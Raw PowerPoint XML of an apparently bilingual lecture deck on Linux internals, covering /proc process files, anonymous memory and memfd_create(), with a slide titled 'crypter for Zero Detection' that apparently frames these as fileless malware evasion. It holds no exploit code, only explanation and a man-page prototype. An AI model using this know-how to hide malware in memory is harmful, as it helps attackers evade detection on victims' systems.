            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" err="1"/>
              <a:t>crypter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Zero Detection  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ax Sharma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="36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84</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303217997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0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>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85</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05849067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2675467"/>
            <a:ext cx="8352927" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>文件系統中，每一個進程都有一個相應的文件 。下面是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目錄下的一些重要文件 ：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmdline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了用於開始進程的命令 ；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了當前進程工作目錄的一個鏈接 ；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/environ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了可用進程環境變量的列表 ；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了正在進程中運行的程序鏈接；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個目錄包含了進程打開的每一個文件的鏈接；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/mem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了進程在內存中的內容；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/stat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了進程的狀態信息；</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>statm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>包含了進程的內存使用信息。</a:t>
            </a:r>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86</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Subdirectory of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itread01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14208944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r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Related Functions</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80981556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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Anonymous memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is used for all backing pages of the file. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Therefore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, files created by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solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>have the same semantics as other anonymous memory allocations such as those allocated using </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mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MAP_ANONYMOUS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag</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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Storage of an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Created by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i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>man7.org</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88</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289386785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2675466"/>
            <a:ext cx="8784975" cy="3849877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>anonymous memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>anonymous mappings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> represent memory that is not backed by a filesystem. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>mappings are implicitly created for program’s stack and heap or by explicit calls to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mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(2) system call. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, the anonymous mappings only define virtual memory areas that the program is allowed to access. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>read accesses will result in creation of a page table entry that references a special physical page filled with zeroes. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the program performs a write, a regular physical page will be allocated to hold the written data. The page will be marked dirty and if the kernel decides to repurpose it, the dirty page will be swapped out.</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89</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Anonymous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Memory                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>community</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3392011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496944" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define _GNU_SOURCE /* See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feature_test_macros</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(7) */ #include &lt;sys/</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mman.h</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&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="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sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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memfd_create</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const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char *</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name</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unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>man7.org</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9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36494013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2675467"/>
            <a:ext cx="8568951" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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memfd_create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does not require a local mount-point. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>can create objects that are not associated with any filesystem and can never be linked into a filesystem. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>backing memory is anonymous memory as if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malloc</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(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>had returned a file-descriptor instead of a pointer. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>that even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shm_open</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(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/dev/</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shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to be a </a:t>
            </a:r>
